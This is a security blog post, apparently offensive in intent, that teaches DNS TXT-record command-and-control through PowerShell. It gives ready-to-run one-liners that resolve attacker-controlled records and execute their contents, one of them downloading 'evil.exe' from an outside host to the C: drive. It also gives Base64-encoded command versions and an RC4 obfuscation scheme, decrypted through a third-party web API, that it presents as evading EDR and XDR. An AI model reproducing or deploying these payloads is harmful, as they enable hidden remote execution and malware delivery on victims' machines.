C2 by DNS lookups

Hello security folks out there, today we are going to look at a topic that allows, for amazingly simple, external executions. The whole thing is based on DNS and should therefore work in most environments. For the same reason it shouldn’t be detected by most EDRs (even its X brother), but let’s have a look. It is based on Powershell, but can also be used on the system itself. Let us dive in …

DNS Record

First, we need a public DNS nameserver to which we have access and authorisation to create records. There we will create three records of type TXT. We will use these in the following payloads and they each have a different function. Note that the records should be created with the shortest possible TTL so that they can be modified quickly.

• name “badboy_notepad“, value “notepad.exe“
• name “badboy_iex“, value “Invoke-WebRequest ‘https://collfuse.com/evil.exe’ -OutFile C:/evil.exe“
• name “badboy_crypto“, we create the value later

You can easily query the records and display the queried values using the following commands in PowerShell.

Resolve-DnsName -Type TXT badboy_notepad.collfuse.com -Server 8.8.8.8
Resolve-DnsName -Type TXT badboy_iex.collfuse.com -Server 8.8.8.8
Resolve-DnsName -Type TXT badboy_crypto.collfuse.com -Server 8.8.8.8

With this preparation, we are ready to create our first payload. We are only doing a POC here and are not doing any real attacks. The result should give you enough input to adapt your payloads to your needs. There are two types of payloads, one that only works directly from powershell (PSPayload) and a second one that also works from “cmd.exe” or “Start/Run” (SysPayload).

Program launch

Let’s start with the first PSPaylaod. You can do this by running the following command

powershell (Resolve-DnsName -Type TXT badboy_notepad.collfuse.com -server 8.8.8.8).strings

Shortly after that, notpad.exe should start, right? I think you can now see the potential of this payload. The notepad is triggered by a simple DNS lookup. OK, but now we want to extend the efficiency of our payload and use it on the whole system. In order for the SysPayload to work, we need to make some notation changes. First, we need to convert the actual command to a Base64 string.

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("(Resolve-DnsName -Type TXT badboy_notepad.collfuse.com -server 8.8.8.8).strings"))

A Base64 string is generated and can be included in the new payload. The payload can then be executed directly from the “Start/Execute” menu. World class!

powershell.exe . (powershell.exe -encodedCommand "KABSAGUAcwBvAGwAdgBlAC0ARABuAHMATgBhAG0AZQAgAC0AVAB5AHAAZQAgAFQAWABUACAAYgBhAGQAYgBvAHkAXwBuAG8AdABlAHAAYQBkAC4AYwBvAGwAbABmAHUAcwBlAC4AYwBvAG0AIAAtAHMAZQByAHYAZQByACAAOAAuADgALgA4AC4AOAApAC4AcwB0AHIAaQBuAGcAcwA=") 

File download

Launching Notepad is a cool thing, but now we want the payload to download a file from the internet and store it on the system. To do this, we will first create another PSPayload. As a reminder, this only works directly from PowerShell

powershell (Resolve-DnsName -Type TXT badboy_iex.collfuse.com).strings

Hang on, what exactly are we doing here? The value of the DNS record tells powershell to download the file “evil.exe” from a web server and then save it to “C:\evil.exe”. Holy shooting star.

Again, we want a SysPayload that goes beyond pure PowerShell. First we need to create a Base64 string of the command again, this looks slightly different in this example. The payload itself is also slightly different. This is because we want to run an Invoke-WebRequest, which cannot be bound directly to the queried DNS value.

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('powershell.exe -Command {$data=(Resolve-DnsName -Type TXT badboy_iex.collfuse.com).strings; powershell.exe -command $data}'))

powershell.exe "& {powershell.exe -encodedCommand "cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBDAG8AbQBtAGEAbgBkACAAewAkAGQAYQB0AGEAPQAoAFIAZQBzAG8AbAB2AGUALQBEAG4AcwBOAGEAbQBlACAALQBUAHkAcABlACAAVABYAFQAIABiAGEAZABiAG8AeQBfAGkAZQB4AC4AYwBvAGwAbABmAHUAcwBlAC4AYwBvAG0AKQAuAHMAdAByAGkAbgBnAHMAOwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AYwBvAG0AbQBhAG4AZAAgACQAZABhAHQAYQB9AA=="}"

Obfuscation

A pretty cool payload so far, but now it is time to cover our tracks. It’s not so great if DNS records are placed that contain “Invoke-Webrequest” or “notepad.exe”. In the wrong eyes, this can raise alarms very quickly. So let us try to hide our intentions by using encryption. Of course, we don’t want to decrypt the payload on the client itself (after decentralised encryption), as that might make the EDR nervous and ruin our beautiful plan. To do this, we use an API, found using the same techniques described in the “Azure Information Gathering” blog, to encrypt “notepad.exe”.

URL https://codebeautify.org/encryptDecrypt/encrypt
Method POST
Payload (TEXT)
  key=collfuse&alg=arcfour&mode=stream&text=notepad.exe

As you can see in the request payload, we use “collfuse” as our super secret key, the algorithm “arcfour” and the mode “stream” to encrypt the value “notepad.exe”. This combination does not change the value on each encryption and decryption. The API now returns the value “Qu4K/eww5Ds2HpI=” which we need to base64 encode and put as the value in the “badboy_crypto” TXT record. This only needs to be done so that this value can be properly queried in a DNS lookup.

$d=irm https://codebeautify.org/encryptDecrypt/encrypt -Method "POST" -Body "key=collfuse&alg=arcfour&mode=stream&text=notepad.exe"
$e=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($d))

The “PSPayload” is now quite long. However, commands like “Invoke-Restmethod” are shortened with “irm” to keep the “SysPayload” as small as possible. With more effort the payload could be shortened even more, feel free to try it.

$d=(Resolve-DnsName -Type TXT badboy_crypto.collfuse.com).strings;$b=[System.Web.HttpUtility]::UrlEncode([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($d)));$r=irm https://codebeautify.org/encryptDecrypt/decrypt -Method "POST" -Body "key=collfuse&alg=arcfour&mode=stream&text=$b";powershell $r

Last but not least, we create the “SysPayload“. Let’s start with the full Base64 string of the “PSPayload“.

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$d=(Resolve-DnsName -Type TXT badboy_crypto.collfuse.com).strings;$b=[System.Web.HttpUtility]::UrlEncode([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($d)));$r=irm https://codebeautify.org/encryptDecrypt/decrypt -Method "POST" -Body "key=collfuse&alg=arcfour&mode=stream&text=$b";powershell $r'))

There is a light at the end of the tunnel, here is the full “SysPayload“

powershell.exe . (powershell.exe -encodedCommand "JABkAD0AKABSAGUAcwBvAGwAdgBlAC0ARABuAHMATgBhAG0AZQAgAC0AVAB5AHAAZQAgAFQAWABUACAAYgBhAGQAYgBvAHkAXwBjAHIAeQBwAHQAbwAuAGMAbwBsAGwAZgB1AHMAZQAuAGMAbwBtACkALgBzAHQAcgBpAG4AZwBzADsAJABiAD0AWwBTAHkAcwB0AGUAbQAuAFcAZQBiAC4ASAB0AHQAcABVAHQAaQBsAGkAdAB5AF0AOgA6AFUAcgBsAEUAbgBjAG8AZABlACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZAApACkAKQA7ACQAcgA9AGkAcgBtACAAaAB0AHQAcABzADoALwAvAGMAbwBkAGUAYgBlAGEAdQB0AGkAZgB5AC4AbwByAGcALwBlAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQALwBkAGUAYwByAHkAcAB0ACAALQBNAGUAdABoAG8AZAAgACIAUABPAFMAVAAiACAALQBCAG8AZAB5ACAAIgBrAGUAeQA9AGMAbwBsAGwAZgB1AHMAZQAmAGEAbABnAD0AYQByAGMAZgBvAHUAcgAmAG0AbwBkAGUAPQBzAHQAcgBlAGEAbQAmAHQAZQB4AHQAPQAkAGIAIgA7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAHIA")

Well done lads, I think we all deserve a coffee now!

Conclusion

We have seen a way to do pretty much anything we want by doing a simple DNS lookup. Most EDRs (and their big brother Mr XDR) don’t trigger because it’s a simple DNS lookup in the background. This blog is just a starting point, I think you will get a lot more out of this technique.

That’s it so far, stay tuned and see you soon!

** midjourney string “an anxious man looking at his computer, the computer is on fire, Canon, fr100mm, octane render, hyper photorealistic, hard – ops, stunning detailed, sci – fi, cinematic, 8k no blur, volumetric lightning , cinematic lighting –ar 1:2 –q 2“